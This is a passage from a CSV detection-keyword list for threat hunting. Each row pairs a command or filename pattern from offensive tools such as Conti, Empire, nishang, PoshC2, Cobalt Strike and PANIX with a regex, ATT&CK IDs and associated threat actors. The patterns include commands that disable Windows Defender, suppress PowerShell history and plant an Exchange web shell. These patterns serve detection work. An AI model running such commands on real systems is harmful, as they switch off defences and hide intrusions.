Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","58644" "*Set-MpPreference -DisableRealtimeMonitoring *true*",".{0,1000}Set\-MpPreference\s\-DisableRealtimeMonitoring\s.{0,1000}true.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","58648" "*Set-MpPreference -ExclusionPath * -DisableRealtimeMonitoring*",".{0,1000}Set\-MpPreference\s\-ExclusionPath\s.{0,1000}\s\-DisableRealtimeMonitoring.{0,1000}","offensive_tool_keyword","powershell","Windows Defender evasion add an exclusion directory for your shady stuff","T1105 - T1203 - T1221 - T1027 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","https://github.com/alperenugurlu/AD_Enumeration_Hunt/blob/alperen_ugurlu_hack/AD_Enumeration_Hunt.ps1","10","10","N/A","N/A","N/A","N/A","58651" "*Set-MpPreference -PUAProtection 
disable*",".{0,1000}Set\-MpPreference\s\-PUAProtection\sdisable.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","58652" "*Set-OabVirtualDirectory -ExternalUrl 'http*://*function Page_Load(){*}*",".{0,1000}Set\-OabVirtualDirectory\s\-ExternalUrl\s\'http.{0,1000}\:\/\/.{0,1000}function\sPage_Load\(\)\{.{0,1000}\}\<\/script\>.{0,1000}","offensive_tool_keyword","ProxyShell","Microsoft Exchange Servers exploits - ProxyLogon and ProxyShell CVE-2021-27065 CVE-2021-34473 CVE-2021-34523 CVE-2021-31207","T1210.003 - T1190 - T1059.003 - T1059.001 - T1059.005 - T1505","TA0001 - TA0002 - TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://www.cert.ssi.gouv.fr/uploads/ANSSI_TLPWHITE_ProxyShell_ProxyLogon_Sigma_yml.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","58653" "*setoolkit *",".{0,1000}setoolkit\s.{0,1000}","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. 
SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","N/A","10","11798","2922","2024-10-21T15:46:18Z","2012-12-31T22:01:33Z","58654" "*Set-PodeWebSocial -Type *",".{0,1000}Set\-PodeWebSocial\s\-Type\s.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","58656" "*SetProcessInjection*encryptor.py*",".{0,1000}SetProcessInjection.{0,1000}encryptor\.py.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","N/A","9","2","151","27","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z","58657" "*SetProcessInjection-main*",".{0,1000}SetProcessInjection\-main.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","N/A","9","2","151","27","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z","58658" "*Set-PSReadlineOption -HistorySaveStyle SaveNothing*",".{0,1000}Set\-PSReadlineOption\s\-HistorySaveStyle\sSaveNothing.{0,1000}","offensive_tool_keyword","powershell","removing powershell console logging to 
avoid detection","T1070.004 - T1086 - T1562.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58659" "*set-pushover-applicationtoken*",".{0,1000}set\-pushover\-applicationtoken.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","58660" "*set-pushover-userkeys*",".{0,1000}set\-pushover\-userkeys.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","58661" "*Set-RemotePSRemoting*",".{0,1000}Set\-RemotePSRemoting.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads 
which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","58662" "*Set-RemotePSRemoting.ps1*",".{0,1000}Set\-RemotePSRemoting\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","58663" "*Set-RemoteShellAccess.ps1*",".{0,1000}Set\-RemoteShellAccess\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","58664" "*Set-RemoteWMI.ps1*",".{0,1000}Set\-RemoteWMI\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","58665" "*Set-RemoteWMI.ps1*",".{0,1000}Set\-RemoteWMI\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","58666" "*SeTrustedCredManAccessPrivilegePoC.exe*",".{0,1000}SeTrustedCredManAccessPrivilegePoC\.exe.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","58667" "*Set-SamAccountPasswordHash * -NTHash *",".{0,1000}Set\-SamAccountPasswordHash\s.{0,1000}\s\-NTHash\s.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","58668" "*Set-ServiceBinPath*",".{0,1000}Set\-ServiceBinPath.{0,1000}","offensive_tool_keyword","empire","Empire 
scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","58670" "*set-shellcode-process default*",".{0,1000}set\-shellcode\-process\sdefault.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 
- T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","58671" "*setspn -A HTTP/*",".{0,1000}setspn\s\-A\sHTTP\/.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","N/A","10","1433","317","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z","58672" "*setspn -T medin -Q */*",".{0,1000}setspn\s\-T\smedin\s\-Q\s.{0,1000}\/.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","N/A","10","1433","317","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z","58673" "*setspn.exe -T medin -Q */*",".{0,1000}setspn\.exe\s\-T\smedin\s\-Q\s.{0,1000}\/.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","N/A","10","1433","317","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z","58675" "*SetStatusCheckIn updates the last time the Agent successfully communicated with the Merlin server*",".{0,1000}SetStatusCheckIn\supdates\sthe\slast\stime\sthe\sAgent\ssuccessfully\scommunicated\swith\sthe\sMerlin\sserver.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","58677" "*setthreadcontext.x64*",".{0,1000}setthreadcontext\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","58678" "*setthreadcontext.x86*",".{0,1000}setthreadcontext\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","58679" "*Setting up GFlags & SilentProcessExit settings in registry?*",".{0,1000}Setting\sup\sGFlags\s\&\sSilentProcessExit\ssettings\sin\sregistry\?.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential 
Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","N/A","10","5","445","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z","58680" "*setuid_setgid.py*",".{0,1000}setuid_setgid\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","58682" "*setup_apfell.sh*",".{0,1000}setup_apfell\.sh.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","58684" "*setup_backdoor_user*",".{0,1000}setup_backdoor_user.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","58685" "*setup_cap_backdoor*",".{0,1000}setup_cap_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","58686" 
"*setup_generator_persistence*",".{0,1000}setup_generator_persistence.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","58687" "*setup_git_persistence*",".{0,1000}setup_git_persistence.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","58688" "*setup_initd_backdoor*",".{0,1000}setup_initd_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","58689" "*setup_malicious_docker_container*",".{0,1000}setup_malicious_docker_container.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","58690" 
"*setup_malicious_package*",".{0,1000}setup_malicious_package.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","58691" "*setup_motd_backdoor*",".{0,1000}setup_motd_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","58692" "*setup_obfuscate_xor_key*",".{0,1000}setup_obfuscate_xor_key.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","58693" "*setup_rc_local_backdoor*",".{0,1000}setup_rc_local_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","58694" "*setup_reflective_loader*",".{0,1000}setup_reflective_loader.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58695" 
